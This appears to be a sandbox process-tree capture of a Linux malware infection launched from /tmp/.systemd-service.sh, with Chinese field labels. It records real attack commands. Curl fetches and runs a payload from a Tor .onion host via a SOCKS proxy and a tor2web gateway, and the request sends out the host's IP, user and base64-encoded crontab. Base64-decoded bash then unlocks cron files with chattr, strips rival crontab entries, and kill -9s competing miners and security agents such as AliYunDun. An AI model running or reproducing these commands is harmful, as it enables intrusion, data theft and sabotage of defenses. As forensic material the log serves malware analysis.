.systemd-servic(进程ID：1056) 命令行:/bin/bash /tmp/.systemd-service.sh
  bash(进程ID：1061) 命令行:bash
    bash(进程ID：1062) 命令行:bash
    bash(进程ID：1063) 命令行:bash
      cut(进程ID：1065) 命令行:cut -d: -f6
      grep(进程ID：1064) 命令行:grep x:0: /etc/passwd
        bash(进程ID：1066) 命令行:grep x:0: /etc/passwd
          id(进程ID：1067) 命令行:id -u
    bash(进程ID：1068) 命令行:bash
    bash(进程ID：1069) 命令行:bash
    head(进程ID：1070) 命令行:head -n 1 /tmp/.X11-unix/01
    ls(进程ID：1071) 命令行:ls /proc//status
    chmod(进程ID：1072) 命令行:chmod +x ./i
    bash(进程ID：1073) 命令行:bash
    rm(进程ID：1074) 命令行:rm -f i
    bash(进程ID：1075) 命令行:bash
    bash(进程ID：1076) 命令行:bash
      tr(进程ID：1079) 命令行:tr   \n
      grep(进程ID：1078) 命令行:grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b
      sort(进程ID：1081) 命令行:sort -uR
      grep(进程ID：1080) 命令行:grep -Ev [.]0
      head(进程ID：1082) 命令行:head -n 1
      curl(进程ID：1077) 命令行:curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in
    uname(进程ID：1084) 命令行:uname -m
    bash(进程ID：1085) 命令行:bash
      cut(进程ID：1088) 命令行:cut -f1 -d-
      md5sum(进程ID：1087) 命令行:md5sum
      date(进程ID：1086) 命令行:date
    bash(进程ID：1101) 命令行:bash
      curl(进程ID：1102) 命令行:curl -4fsSLk checkip.amazonaws.com
    whoami(进程ID：1104) 命令行:whoami
    uname(进程ID：1105) 命令行:uname -m
    uname(进程ID：1106) 命令行:uname -n
    bash(进程ID：1107) 命令行:bash
      awk(进程ID：1112) 命令行:awk {print $1}
      md5sum(进程ID：1111) 命令行:md5sum
      awk(进程ID：1110) 命令行:awk {print $2}
      grep(进程ID：1109) 命令行:grep inet 
      ip(进程ID：1108) 命令行:ip a
    bash(进程ID：1113) 命令行:bash
      base64(进程ID：1115) 命令行:base64 -w0
      crontab(进程ID：1114) 命令行:crontab -l
    curl(进程ID：1116) 命令行:""curl -4fsSLkA- -m200 -x socks5h://:9050 4k6jta4zrwzm7u54am3vnjpnlvlbujyvrtprytf4scmrw7u3udmgqaqd.onion/int.x86_64 -o./b1d97fd3420a29af01167b0dc13b433c -e36.99.136.128_root_x86_64_dev_77adc9859788bce9322b7631ef5b9ebb_IyBFZGl0IHRoaXMgZmlsZSB0byBpbnRyb2R1Y2UgdGFza3MgdG8gYmUgcnVuIGJ5IGNyb24uCiMgCiMgRWFjaCB0YXNrIHRvIHJ1biBoYXMgdG8gYmUgZGVmaW5lZCB0aHJvdWdoIGEgc2luZ2xlIGxpbmUKIyBpbmRpY2F0aW5nIHdpdGggZGlmZmVyZW50IGZpZWxkcyB3aGVuIHRoZSB0YXNrIHdpbGwgYmUgcnVuCiMgYW5kIHdoYXQgY29tbWFuZCB0byBy
    curl(进程ID：1118) 命令行:""curl -4fsSLkA- -m200 4k6jta4zrwzm7u54am3vnjpnlvlbujyvrtprytf4scmrw7u3udmgqaqd.tor2web.in/int.x86_64 -o./b1d97fd3420a29af01167b0dc13b433c -e36.99.136.128_root_x86_64_dev_77adc9859788bce9322b7631ef5b9ebb_IyBFZGl0IHRoaXMgZmlsZSB0byBpbnRyb2R1Y2UgdGFza3MgdG8gYmUgcnVuIGJ5IGNyb24uCiMgCiMgRWFjaCB0YXNrIHRvIHJ1biBoYXMgdG8gYmUgZGVmaW5lZCB0aHJvdWdoIGEgc2luZ2xlIGxpbmUKIyBpbmRpY2F0aW5nIHdpdGggZGlmZmVyZW50IGZpZWxkcyB3aGVuIHRoZSB0YXNrIHdpbGwgYmUgcnVuCiMgYW5kIHdoYXQgY29tbWFuZCB0byBydW4gZm9yIHRoZS
    chmod(进程ID：1120) 命令行:chmod +x ./b1d97fd3420a29af01167b0dc13b433c
    b1d97fd3420a29a(进程ID：1121) 命令行:./b1d97fd3420a29af01167b0dc13b433c
      sh(进程ID：1122) 命令行:sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApjaGF0dHIgLWkgL3RtcC8uWDExLXVuaXgKY2hhdHRyIC1SaSAvdG1wLy5YMTEtdW5peApbIC1mIC90bXAvLlgxMS11bml4IF0gJiYgcm0gLWYgL3RtcC8uWDExLXVuaXggClsgLWQgL3RtcC8uWDExLXVuaXggXSB8fCBta2RpciAtcCAvdG1wLy5YMTEtdW5peAo=|base64 -d|bash
        bash(进程ID：1125) 命令行:bash
          bash(进程ID：1126) 命令行:bash
          chattr(进程ID：1127) 命令行:chattr -i /tmp/.X11-unix
          chattr(进程ID：1128) 命令行:chattr -Ri /tmp/.X11-unix
        base64(进程ID：1124) 命令行:base64 -d
        sh(进程ID：1123) 命令行:sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApjaGF0dHIgLWkgL3RtcC8uWDExLXVuaXgKY2hhdHRyIC1SaSAvdG1wLy5YMTEtdW5peApbIC1mIC90bXAvLlgxMS11bml4IF0gJiYgcm0gLWYgL3RtcC8uWDExLXVuaXggClsgLWQgL3RtcC8uWDExLXVuaXggXSB8fCBta2RpciAtcCAvdG1wLy5YMTEtdW5peAo=|base64 -d|bash
      Zks3c59U(进程ID：1129) 命令行:./b1d97fd3420a29af01167b0dc13b433c
        sh(进程ID：1150) 命令行:""sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pO2ZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWk7Y2hhdHRyIC1pIC9ldGMvaG9zdHMKY3JvbnRhYiAtbCA7Z3JlcCAtaVJFICJjYWNoZS9hdXRvfGN0bGlifDcwT1hRR3xNYWx3YXJlfE1pbmVyfFZVc2VzNXxcLXVuaXh8XC5cL29rYXxcLmNvbmZpZ3JjfFwucnN5bmN
          base64(进程ID：1152) 命令行:base64 -d
          bash(进程ID：1153) 命令行:bash
            bash(进程ID：1154) 命令行:bash
            xargs(进程ID：1156) 命令行:xargs chattr -i
              chattr(进程ID：1157) 命令行:""chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/.placeholder /etc/cron.d/mdadm /etc/cron.daily /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/passwd /etc/cron.daily/bsdmainutils /etc/cron.daily/popularity-contest /etc/cron.daily/ubuntu-advantage-tools /etc/cron.daily/.placeholder /etc/cron.daily/apport /etc/cron.daily/mdadm /etc/cron.daily/apt-compat /etc/cron.daily/man-db /etc/cron.daily/mlocate /etc/cron.hourly /etc/cron.hourly/.placeholder 
            find(进程ID：1155) 命令行:find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly
            xargs(进程ID：1159) 命令行:xargs chattr -i
              chattr(进程ID：1160) 命令行:chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/crontabs/root /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool
            find(进程ID：1158) 命令行:find /var/spool/cron
            chattr(进程ID：1161) 命令行:chattr -i /etc/hosts
            crontab(进程ID：1162) 命令行:crontab -l
            xargs(进程ID：1165) 命令行:xargs rm -f
              rm(进程ID：1166) 命令行:rm -f /etc/cron.daily/mlocate /etc/cron.daily/mlocate
            cut(进程ID：1164) 命令行:cut -f 1 -d :
            grep(进程ID：1163) 命令行:grep -iRE cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
            crontab(进程ID：1169) 命令行:crontab -
            grep(进程ID：1168) 命令行:grep -ivE cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64
            crontab(进程ID：1167) 命令行:crontab -l
            grep(进程ID：1170) 命令行:grep -q onion /etc/hosts
            grep(进程ID：1171) 命令行:grep -q tor2w /etc/hosts
            xargs(进程ID：1176) 命令行:xargs kill -9
              kill(进程ID：1177) 命令行:kill -9
            cut(进程ID：1175) 命令行:cut -d/ -f1
            awk(进程ID：1174) 命令行:awk {print $NF}
            grep(进程ID：1173) 命令行:""grep -E 3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139
            netstat(进程ID：1172) 命令行:netstat -antp
            pkill(进程ID：1178) 命令行:""pkill -9 -f defunct|./cron|./oka|\\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\\\x5bstea\\\x5d|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpda
            xargs(进程ID：1188) 命令行:xargs -I % kill -9 %
              kill(进程ID：1205) 命令行:kill -9 8
              kill(进程ID：1206) 命令行:kill -9 13
              kill(进程ID：1210) 命令行:kill -9 34
              kill(进程ID：1211) 命令行:kill -9 1055
            awk(进程ID：1187) 命令行:awk {print $1}
            grep(进程ID：1186) 命令行:grep -E defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon
            grep(进程ID：1185) 命令行:grep -v grep
            ps(进程ID：1184) 命令行:ps x
            awk(进程ID：1214) 命令行:awk -F, {print $(NF-1)}
            grep(进程ID：1213) 命令行:""grep -E 3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.17
            sed(进程ID：1215) 命令行:sed s/pid=//g
            xargs(进程ID：1216) 命令行:xargs kill -9
              kill(进程ID：1231) 命令行:kill -9
            ss(进程ID：1212) 命令行:ss -antp
          sh(进程ID：1151) 命令行:""sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pO2ZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWk7Y2hhdHRyIC1pIC9ldGMvaG9zdHMKY3JvbnRhYiAtbCA7Z3JlcCAtaVJFICJjYWNoZS9hdXRvfGN0bGlifDcwT1hRR3xNYWx3YXJlfE1pbmVyfFZVc2VzNXxcLXVuaXh8XC5cL29rYXxcLmNvbmZpZ3JjfFwucnN5bmN
        sh(进程ID：1232) 命令行:""sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pO2ZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWk7Y2hhdHRyIC1pIC9ldGMvaG9zdHMKY3JvbnRhYiAtbCA7Z3JlcCAtaVJFICJjYWNoZS9hdXRvfGN0bGlifDcwT1hRR3xNYWx3YXJlfE1pbmVyfFZVc2VzNXxcLXVuaXh8XC5cL29rYXxcLmNvbmZpZ3JjfFwucnN5bmN
          bash(进程ID：1235) 命令行:bash
            bash(进程ID：1236) 命令行:bash
            xargs(进程ID：1238) 命令行:xargs chattr -i
              chattr(进程ID：1239) 命令行:""chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/.placeholder /etc/cron.d/mdadm /etc/cron.daily /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/passwd /etc/cron.daily/bsdmainutils /etc/cron.daily/popularity-contest /etc/cron.daily/ubuntu-advantage-tools /etc/cron.daily/.placeholder /etc/cron.daily/apport /etc/cron.daily/mdadm /etc/cron.daily/apt-compat /etc/cron.daily/man-db /etc/cron.hourly /etc/cron.hourly/.placeholder /etc/cron.monthly /etc/c
            find(进程ID：1237) 命令行:find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly
            xargs(进程ID：1241) 命令行:xargs chattr -i
              chattr(进程ID：1242) 命令行:chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/crontabs/root /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool
            find(进程ID：1240) 命令行:find /var/spool/cron
            chattr(进程ID：1243) 命令行:chattr -i /etc/hosts
            crontab(进程ID：1244) 命令行:crontab -l
            xargs(进程ID：1247) 命令行:xargs rm -f
              rm(进程ID：1248) 命令行:rm -f
            cut(进程ID：1246) 命令行:cut -f 1 -d :
            grep(进程ID：1245) 命令行:grep -iRE cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
            crontab(进程ID：1251) 命令行:crontab -
            grep(进程ID：1250) 命令行:grep -ivE cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64
            crontab(进程ID：1249) 命令行:crontab -l
            grep(进程ID：1252) 命令行:grep -q onion /etc/hosts
            grep(进程ID：1253) 命令行:grep -q tor2w /etc/hosts
            xargs(进程ID：1258) 命令行:xargs kill -9
              kill(进程ID：1259) 命令行:kill -9
            cut(进程ID：1257) 命令行:cut -d/ -f1
            awk(进程ID：1256) 命令行:awk {print $NF}
            grep(进程ID：1255) 命令行:""grep -E 3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139
            netstat(进程ID：1254) 命令行:netstat -antp
            pkill(进程ID：1260) 命令行:""pkill -9 -f defunct|./cron|./oka|\\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\\\x5bstea\\\x5d|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpda
            xargs(进程ID：1276) 命令行:xargs -I % kill -9 %
              kill(进程ID：1277) 命令行:kill -9 8
              kill(进程ID：1278) 命令行:kill -9 13
              kill(进程ID：1288) 命令行:kill -9 34
              kill(进程ID：1290) 命令行:kill -9 1055
            awk(进程ID：1275) 命令行:awk {print $1}
            grep(进程ID：1274) 命令行:grep -E defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon
            grep(进程ID：1273) 命令行:grep -v grep
            ps(进程ID：1272) 命令行:ps x
            awk(进程ID：1295) 命令行:awk -F, {print $(NF-1)}
            sed(进程ID：1296) 命令行:sed s/pid=//g
            xargs(进程ID：1297) 命令行:xargs kill -9
              kill(进程ID：1308) 命令行:kill -9
            grep(进程ID：1294) 命令行:""grep -E 3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.17
            ss(进程ID：1293) 命令行:ss -antp
          base64(进程ID：1234) 命令行:base64 -d
          sh(进程ID：1233) 命令行:""sh -c echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pO2ZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWk7Y2hhdHRyIC1pIC9ldGMvaG9zdHMKY3JvbnRhYiAtbCA7Z3JlcCAtaVJFICJjYWNoZS9hdXRvfGN0bGlifDcwT1hRR3xNYWx3YXJlfE1pbmVyfFZVc2VzNXxcLXVuaXh8XC5cL29rYXxcLmNvbmZpZ3JjfFwucnN5bmN
    rm(进程ID：1130) 命令行:rm -f ./b1d97fd3420a29af01167b0dc13b433c
    head(进程ID：1131) 命令行:head -n 1 /tmp/.X11-unix/01
    ls(进程ID：1132) 命令行:ls /proc/1129/status
    head(进程ID：1133) 命令行:head -n 1 /tmp/.X11-unix/01
    ls(进程ID：1134) 命令行:ls /proc/1129/status
    head(进程ID：1135) 命令行:head -n 1 /tmp/.X11-unix/01
    ls(进程ID：1136) 命令行:ls /proc/1129/status
  base64(进程ID：1060) 命令行:base64 -d
  .systemd-servic(进程ID：1059) 命令行:/bin/bash /tmp/.systemd-service.sh